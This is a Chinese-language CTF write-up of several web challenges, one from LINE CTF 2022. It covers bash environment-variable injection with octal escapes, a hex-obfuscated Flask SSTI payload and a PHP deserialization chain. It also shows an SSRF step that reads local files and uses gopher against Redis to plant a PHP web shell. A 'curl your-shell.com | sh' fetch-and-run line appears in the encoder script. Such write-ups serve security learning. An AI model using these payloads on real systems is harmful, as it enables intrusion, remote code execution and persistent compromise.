Web

ezphp

LINECTF2022wp

好像还不是很坐牢。所以这篇能叫wp 全程看tkmk神仙疯狂输出，我在旁边打杂学习 四个简单一点的题都出了，然后一两个解的几个题没心情看呜呜说到最后还是只会做简单题的垃圾呜呜 又见p神文章题这次直接给了bash，但是不给字母了。然后还是一样的命令执行 putenv不加等号的话表示unset掉这个变量。不过本身一次处理结束那个变量也就没了，好像也没必要多做操作 不给用字母第一反应8进制，但实际上打了半天打不通。。。本地远程试八进制都没成功，tkmk神仙倒是说他用这个形式$'\000'一打就通了我暂且蒙在鼓里 然后厚着脸皮去问了一下。payload大抵是这个模式，还说可以在man里面搜到，Letmetrytry 发现为什么当初觉得打不通了。。。因为当时本地测试用PHP的getenv函数获取环境变量的值，并不会被解析。所以以为没有解析，实际上直接用system去获取一下就能发现是解析了的，以及没有回显，要靠touch一个东西之类的来打。。。 BASH_ENV可以直接打通，BASH_FUNC打半天没反应以及发现了一个奇怪的事情，直接\000这种八进制echo出来也被解析成了字符串，但是只有$'\000' 这种套了$和引号的形式能被正确解析执行命令 这个语法在man里面搜oct会更容易找到 Words of the form $'string' are treated specially. The word expands to string, with backslash-escaped characters replaced as specified by the ANSI C standard.

https://blog.z3ratu1.cn/LINECTF2022wp.html

<?php
    error_reporting(0);

    function bye($s, $ptn){
        if(preg_match($ptn, $s)){
            return false;
        }
        return true;
    }

    foreach($_GET["env"] as $k=>$v){
        if(bye($k, "/=/i") && bye($v, "/[a-zA-Z]/i")) {
            putenv("{$k}={$v}");
        }
    }
    system("bash -c 'imdude'");
    
    foreach($_GET["env"] as $k=>$v){
        if(bye($k, "/=/i")) {
            putenv("{$k}");
        }
    }
    highlight_file(__FILE__);
?>

import re

payload = "curl https://your-shell.com/42.193.100.225:4444 | sh"
result = ""
for c in payload:
    if re.match("[a-zA-Z]", c):
        result += "$'\\" + str(oct(ord(c)))[2:].rjust(3, '0') + "'"
    else:
        result += c
print("$(" + result + ")")

Flask_ssti

{{(cxh|attr("\x5f\x5f\x69\x6e\x69\x74\x5f\x5f")|attr("\x5f\x5f\x67\x6c\x6f\x62\x61\x6c\x73\x5f\x5f")|attr("\x67\x65\x74")("\x5f\x5f\x62\x75\x69\x6c\x74\x69\x6e\x73\x5f\x5f")|attr("\x67\x65\x74")("\x65\x76\x61\x6c")("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x22\x6f\x73\x22\x29\x2e\x70\x6f\x70\x65\x6e\x28\x22\x63\x61\x74\x20\x2f\x66\x6c\x61\x67\x22\x29\x2e\x72\x65\x61\x64\x28\x29"))}}

Final web

# Exception 抛出异常阻止程序正常结束调用destruct魔术方法
if (isset($_GET["ppsuc"])) {
    $a=unserialize($_GET['ppsuc']);
    throw new Exception("高一新生报道");
} else {
    highlight_file(__FILE__);
}

<?php
error_reporting(0);
class one {
    public $object;
    public $year_parm=array(0=>"Happy_func");
    
    public function MeMeMe() {
        $a = new $this->object('./');
        foreach($a as $f) {
            echo $f."\n";
        }
        // array_walk($this, function($fn, $prev){
        //     if ($fn[0] === "Happy_func" && $prev === "year_parm") {
        //         $a = new $this->object ('./');
        //         foreach ($a as $f){
        //             echo $f."\n";
        //         }
        //     }
        // });
        
    }

    public function __destruct() {
        @$this->object->add();
    }

    public function __toString() {
        return $this->object->string;
    }
    public function __construct($str) {
        $this->object = $str;
    }
}

class second {
    public $filename;

    protected function addMe() {
        return "Wow you have sovled".$this->filename;
    }

    public function __call($func, $args) {
        call_user_func([$this, $func."Me"], $args);
    }
}

class third {
    private $string;
    public function __construct($string) {
        $this->string = $string;
    }

    public function __get($name) {
        $var = $this->$name;
        $var[$name]();
    }
}
$a = new one(new second());

#这个php自带类DirectoryIterator回显目录下文件
$a->object->filename = new one(new third(array('string'=>array(new one('DirectoryIterator'),'MeMeME'))));
$n = null;
echo urlencode(serialize( array($a,$n)));

#回显
# a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"thirdstring";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";s:17:"DirectoryIterator";s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeME";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;N;}.

#修改
# a:2:{i:0;O:3:"one":2:{s:6:"object";O:6:"second":1:{s:8:"filename";O:3:"one":2:{s:6:"object";O:5:"third":1:{s:13:"thirdstring";a:1:{s:6:"string";a:2:{i:0;O:3:"one":2:{s:6:"object";s:17:"DirectoryIterator";s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:1;s:6:"MeMeME";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}}s:9:"year_parm";a:1:{i:0;s:10:"Happy_func";}}i:0;N;}

#url编码
# a%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A6%3A%22second%22%3A1%3A%7Bs%3A8%3A%22filename%22%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3BO%3A5%3A%22third%22%3A1%3A%7Bs%3A13%3A%22%00third%00string%22%3Ba%3A1%3A%7Bs%3A6%3A%22string%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A3%3A%22one%22%3A2%3A%7Bs%3A6%3A%22object%22%3Bs%3A17%3A%22DirectoryIterator%22%3Bs%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A1%3Bs%3A6%3A%22MeMeME%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7D%7Ds%3A9%3A%22year_parm%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A10%3A%22Happy_func%22%3B%7D%7Di%3A0%3BN%3B%7D

#通过反序列化后数组下标修改，触发第一个类的赋值，从而触发destruct魔术方法

#发现testhook.php
<?php 
    // create curl resource 
    $ch = curl_init(); 
    if(isset($_POST["handler"])){
        // set url 
        curl_setopt($ch, CURLOPT_URL, $_POST["handler"]); 

        //return the transfer as a string 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

        // $output contains the output string 
        $output = curl_exec($ch); 

        // close curl resource to free up system resources 
        curl_close($ch);

        echo $output;
        
    } else{
        highlight_file(__FILE__);
        die("test your website");
    }

?> 

handler=file:///var/log/apt/history.log

gopher://127.0.0.1:6379/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A/var/www/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A

#只对高亮地区url编码

gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A%0D%0A%0A

#payload:
handler=gopher://127.0.0.1:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252434%250D%250A%250A%250A%253C%253Fphp%2520system%2528%2524_GET%255B%2527cmd%2527%255D%2529%253B%2520%253F%253E%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252413%250D%250A%2Fvar%2Fwww%2Fhtml%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25249%250D%250Ashell.php%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A

#解码后的redis命令
handler=gopher://127.0.0.1:6379/_*1
$8
flushall
*3
$3
set
$1
1
$34
<?php system($_GET['cmd']); ?>
*4
$6
config
$3
set
$3
dir
$13
/var/www/html
*4
$6
config
$3
set
$10
dbfilename
$9
shell.php
*1
$4
save